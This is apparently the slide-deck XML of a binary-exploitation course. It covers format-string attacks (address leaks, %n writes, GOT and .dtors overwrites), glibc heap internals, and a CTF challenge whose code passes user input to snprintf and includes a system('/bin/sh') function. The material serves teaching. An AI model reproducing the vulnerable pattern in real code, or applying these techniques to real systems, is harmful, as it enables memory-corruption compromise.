        <p:nvSpPr>
          <p:cNvPr id="2105" name="Shape 2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 address on stack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.got.plt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.dtors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readelf -s a.out |grep DTOR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29: 08049518 	0 OBJECT  LOCAL  DEFAULT   19 __DTOR_LIST__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56: 0804951c 	0 OBJECT  GLOBAL HIDDEN   19 __DTOR_END__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__atexit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...you name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Addressing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mov eax, [ebx]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mov [var], ebx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mov eax, [esi-4]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mov [esi+eax], cl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mov edx, [esi+4*ebx] </a:t>
            </a:r>
            <a:endParaRPr sz="180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Shape 2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/ write any position if map permission is allowed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GOT hijacking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variable value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Leak libc base address and calculate offset to get another function address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Leak libc version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Leak stack address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2111" name="Shape 2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Usage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Shape 2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Strategy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2117" name="Shape 2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Leak Info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%x %p to leak stack info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 leak arbitrary addr info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If buf on stack, write addr in buf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If buf not on stack, write addr pointer on stack first, then use another printf to leak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dest addr not known, leak addr first(mostly stack)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buf on stack, use addr in buf (Libformatstr can help)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buf not on stack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Common way: use ebp-&gt;ebp pair (or sth similar) to change arbitrary addr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If using snprintf, then write addr first using %n (suitable for 0x0804xxx)</a:t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Shape 2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tricks and gotchas</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2123" name="Shape 2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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: How to calculate positional param?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A: Libc said that the behavior is undefined if positional param position is larger than provided non-positional param count. But for most case, the addr should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="14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word_size x position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" sz="1400"/>
              <a:t>So it’s more easier to open your gdb and use pattern string to find the actual position instead of calculating. Besides, %0$x is not recognised.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400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: What if the second %n needs a small value to be written while bytes_written just goes larger?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A: Just use integer overflow. (For example, if %hn applies,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second_padding=(second_size+65536-first_padding) % 65536 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>)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Shape 2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tricks and gotchas</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2129" name="Shape 2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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: When can I use %n and when shouldn’t?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A: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>For printf, it’ll be too large to print out in your console(or socket if socat/xinetd used). But for snprintf, you can use %n with not too large values. (0x0804xxxx can be considered not too large) snprintf won’t overflow, but will calculate the actual value and return actual bytes_written.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400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: Can I modify more than 1 values on stack within a single format string?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A: Definitely you can.But if you want the second value addr to be based on the first modified value, there are some tricks here: The first %n must not be positional param. That’s because In libc implementation, the positional values are copied into an internal struct in function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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printf_positional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> before applying fmt transformation.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Shape 2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Challenge</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2135" name="Shape 2135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591100" y="1379200"/>
            <a:ext cx="8047200" cy="350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 simplified version of SCTF 2016 pwn200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static s[0x400];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static buf[0x400];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void run_system() { system("/bin/sh"); }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for (int i = 0; i &lt; 2; i++) {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	    fgets(buf, 1024, stdin);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	    snprintf(s, 1024, buf);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	    puts(s);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	    fflush(stdout);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6" name="Shape 2136"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183425" y="2348100"/>
            <a:ext cx="26916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Can you pwn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using different solutions?</a:t>
            </a:r>
            <a:endParaRPr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Shape 2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Tools and Ref</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2142" name="Shape 2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https://github.com/hellman/libformatstr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https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf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http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf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Shape 2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Exploitation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2148" name="Shape 2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Mechanism of glibc heap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 of heap metadata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Workflow of malloc and free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overflow exploitation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Fastbin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Unlink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Off-by-one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after free</a:t>
            </a:r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Shape 2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Implementations</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2154" name="Shape 2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dlmalloc - General purpose allocator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ptmalloc2 - glibc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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>forked from dlmalloc, adding thread support since 2006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jemalloc - FreeBSD and Firefox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tcmalloc - Google Chrome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libumem - Solaris</a:t>
            </a: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Shape 2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 support of ptmalloc2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2160" name="Shape 2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threads maintain separate heap, which is called </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>per thread arena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Arena created by main thread is called </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main arena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Arena number limit is based on number of cores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32 bit systems: Number of arena = 2 * number of cores.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64 bit systems: Number of arena = 8 * number of cores.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Shape 2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Arena header structure: malloc_state </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2166" name="Shape 2166"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8754600" cy="3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malloc_state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mutex_t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mutex; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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Serialize access.  */</a:t>
            </a:r>
            <a:endParaRPr sz="13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flags; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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Flags (formerly in max_fast).  */</a:t>
            </a:r>
            <a:endParaRPr sz="13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mfastbinptr fastbinsY[NFASTBINS]; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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Fastbins */</a:t>
            </a:r>
            <a:endParaRPr sz="13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mchunkptr top; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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Base of the topmost chunk, not otherwise kept in a bin */</a:t>
            </a:r>
            <a:endParaRPr sz="13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mchunkptr last_remainder; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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The remainder from the most recent split of a small request */</a:t>
            </a:r>
            <a:endParaRPr sz="13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mchunkptr bins[NBINS * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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" sz="13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Normal bins packed as described above */</a:t>
            </a:r>
            <a:endParaRPr sz="13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binmap[BINMAPSIZE]; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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Bitmap of bins */</a:t>
            </a:r>
            <a:endParaRPr sz="13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malloc_state *next; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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Linked list */</a:t>
            </a:r>
            <a:endParaRPr sz="13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malloc_state *next_free; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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Linked list for free arenas.  */</a:t>
            </a:r>
            <a:endParaRPr sz="13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INTERNAL_SIZE_T system_mem; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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Memory allocated in this arena.  */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INTERNAL_SIZE_T max_system_mem;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malloc_state </a:t>
            </a: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main_arena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3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global variable in libc.so */</a:t>
            </a:r>
            <a:endParaRPr sz="13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push &lt;reg32&gt; == sub esp, 4; mov [esp], &lt;reg32&gt;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push &lt;mem&gt;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push &lt;con32&gt;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push eax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push [var]</a:t>
            </a:r>
            <a:endParaRPr sz="180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Shape 2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Arena</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2172" name="Shape 2172"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="959350" y="2520550"/>
            <a:ext cx="1389000" cy="1118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Allocated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2173" name="Shape 2173"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2348400" y="2520550"/>
            <a:ext cx="1275300" cy="1118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Allocated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2174" name="Shape 2174"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3623700" y="2520550"/>
            <a:ext cx="741000" cy="1118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2175" name="Shape 2175"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4364700" y="2520550"/>
            <a:ext cx="997200" cy="1118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Allocated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2176" name="Shape 2176"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361900" y="2520550"/>
            <a:ext cx="883500" cy="1118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2177" name="Shape 2177"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6245400" y="2520550"/>
            <a:ext cx="1040400" cy="1118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Allocated Chunk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2178" name="Shape 2178"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7285800" y="2520550"/>
            <a:ext cx="741000" cy="111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2179" name="Shape 2179"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="959350" y="3884925"/>
            <a:ext cx="7031400" cy="171000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 833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Shape 2180"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360950" y="4390725"/>
            <a:ext cx="1275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0x804b000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2181" name="Shape 2181"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7331000" y="4422025"/>
            <a:ext cx="1275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0x805c000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2182" name="Shape 2182"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6630125" y="1669375"/>
            <a:ext cx="883500" cy="4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remainder</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2183" name="Shape 2183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5746625" y="1669375"/>
            <a:ext cx="883500" cy="4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top</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2184" name="Shape 2184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4863125" y="1669375"/>
            <a:ext cx="883500" cy="4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2185" name="Shape 2185"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7513625" y="1669375"/>
            <a:ext cx="883500" cy="4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2186" name="Shape 2186"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3979625" y="1669375"/>
            <a:ext cx="883500" cy="4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mutex</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2187" name="Shape 2187"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5283475" y="1172425"/>
            <a:ext cx="1709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struct malloc_state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main_arena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188" name="Shape 2188"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833825" y="1954150"/>
            <a:ext cx="13224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 heap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segment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189" name="Shape 2189"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2183" idx="2"/>
            <a:endCxn id="2178" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6188375" y="2139475"/>
            <a:ext cx="14679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Shape 2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Chunks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2195" name="Shape 2195"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2834675" y="2141400"/>
            <a:ext cx="1661400" cy="3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prev_size</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2196" name="Shape 2196"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2834675" y="2471400"/>
            <a:ext cx="884400" cy="3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size</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2197" name="Shape 2197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2834675" y="2801400"/>
            <a:ext cx="1661400" cy="3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fd</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2198" name="Shape 2198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2834675" y="3131400"/>
            <a:ext cx="1661400" cy="3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bk</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2199" name="Shape 2199"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2834675" y="3461400"/>
            <a:ext cx="166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unused</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2200" name="Shape 2200"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2834675" y="4034100"/>
            <a:ext cx="1661400" cy="330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prev_size</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2201" name="Shape 2201"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4235075" y="2471400"/>
            <a:ext cx="261000" cy="3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endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2202" name="Shape 2202"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3974075" y="2471400"/>
            <a:ext cx="261000" cy="3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</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2203" name="Shape 2203"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3718925" y="2471400"/>
            <a:ext cx="261000" cy="3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</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2204" name="Shape 2204"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6135175" y="2175700"/>
            <a:ext cx="1661400" cy="3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prev_size</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2205" name="Shape 2205"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6135175" y="2505700"/>
            <a:ext cx="884400" cy="3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size</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2206" name="Shape 2206"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6135175" y="2835700"/>
            <a:ext cx="1661400" cy="123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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2207" name="Shape 2207"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6135175" y="4068400"/>
            <a:ext cx="1661400" cy="3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data(prev_size)</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2208" name="Shape 2208"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7535575" y="2505700"/>
            <a:ext cx="261000" cy="3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endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2209" name="Shape 2209"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7274575" y="2505700"/>
            <a:ext cx="261000" cy="3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</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2210" name="Shape 2210"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7019425" y="2505700"/>
            <a:ext cx="261000" cy="3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</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2211" name="Shape 2211"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1673500" y="1995375"/>
            <a:ext cx="753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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2212" name="Shape 2212"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2427500" y="2128425"/>
            <a:ext cx="4062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3" name="Shape 2213"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1294700" y="3903075"/>
            <a:ext cx="11328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chunk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2214" name="Shape 2214"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2427500" y="4036125"/>
            <a:ext cx="4062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5" name="Shape 2215"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3053675" y="1759975"/>
            <a:ext cx="12234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chunk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2216" name="Shape 2216"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6194275" y="1759975"/>
            <a:ext cx="1543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allocated chunk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2217" name="Shape 2217"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4990825" y="2029675"/>
            <a:ext cx="753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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2218" name="Shape 2218"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5744725" y="2162725"/>
            <a:ext cx="4062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9" name="Shape 2219"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4990825" y="2714225"/>
            <a:ext cx="753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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2220" name="Shape 2220"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5744725" y="2830075"/>
            <a:ext cx="4062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1" name="Shape 2221"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4612025" y="3937375"/>
            <a:ext cx="11328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chunk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2222" name="Shape 2222"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5744725" y="4070425"/>
            <a:ext cx="4062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3" name="Shape 2223"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="72225" y="2514900"/>
            <a:ext cx="26358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PREV_INUSE (P)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1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IS_MMAPPED (M)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NON_MAIN_ARENA (N) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2224" name="Shape 2224"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7876725" y="2217925"/>
            <a:ext cx="406200" cy="184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Shape 2225"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8137725" y="2927350"/>
            <a:ext cx="715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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2226" name="Shape 2226"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7855350" y="2844825"/>
            <a:ext cx="225900" cy="1553700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 8333" name="adj1"/>
              <a:gd fmla="val 8253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Shape 2227"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8140025" y="3903075"/>
            <a:ext cx="715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</a:t>
            </a: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Shape 2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Bins</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2233" name="Shape 2233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="85206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bins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very small chunks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small bins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bins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unsorted bins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Shape 2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bins</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2239" name="Shape 2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Single linked list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10 fast bins in total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Size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16~64 bytes for x86_32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32~128 bytes for x64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Last In First Out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coalescing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Will not clear PREV_INUSE when fast chunk is freed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Shape 2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bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2245" name="Shape 2245"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2536800" y="1453975"/>
            <a:ext cx="1175400" cy="24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0x804b000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2246" name="Shape 2246"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712200" y="1453975"/>
            <a:ext cx="1175400" cy="24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47" name="Shape 2247"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4887600" y="1453975"/>
            <a:ext cx="1175400" cy="24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0x804b030</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2248" name="Shape 2248"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2426400" y="1967150"/>
            <a:ext cx="1396200" cy="1343700"/>
            <a:chOff x="1347625" y="2053825"/>
            <a:chExt cx="1396200" cy="1343700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2249" name="Shape 2249"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347625" y="20538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prev_size</a:t>
              </a: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1347625" y="23031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size=16</a:t>
              </a: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1347625" y="25524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fd=NULL</a:t>
              </a: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1347625" y="28017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bk</a:t>
              </a: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1347625" y="3051025"/>
              <a:ext cx="1396200" cy="3465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unused</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2254" name="Shape 2254"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4777200" y="1967150"/>
